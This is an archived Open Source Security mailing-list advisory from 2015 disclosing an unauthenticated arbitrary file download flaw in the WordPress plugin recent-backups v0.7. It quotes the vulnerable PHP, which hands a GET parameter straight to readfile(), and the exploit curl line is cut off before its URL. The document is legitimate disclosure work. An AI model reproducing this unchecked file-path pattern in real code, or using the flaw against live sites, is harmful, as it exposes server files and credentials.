Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Tue, 14 Jul 2015 17:25:57 -0400
From: "Larry W. Cashdollar" <>
To: Open Source Security <>
Subject: Remote file download vulnerability in recent-backups v0.7 wordpress

Title: Remote file download vulnerability in recent-backups v0.7 wordpress plugin
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-13
Download Site:
Vendor Notified: 2015-07-13
Vendor Contact:
Description: To be used with the BackupWordPress plugin to list the contents of the backup directory in a dashboard widget.
The code in  download-file.php doesn't verify the user is logged in or sanitize what files can be downloaded.  This vulnerability can be used
to download sensitive system files:

     2	$file = $_GET['file_link'];
     4	if (file_exists($file)) {
     5	    header('Content-Description: File Transfer');
     6	    header('Content-Type: application/octet-stream');
     7	    header('Content-Disposition: attachment; filename='.basename($file));
     8	    header('Content-Transfer-Encoding: binary');
     9	    header('Expires: 0');
    10	    header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
    11	    header('Pragma: public');
    12	    header('Content-Length: ' . filesize($file));
    13	    ob_clean();
    14	    flush();
    15	    readfile($file);

Exploit Code:
	• $ curl -v "

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ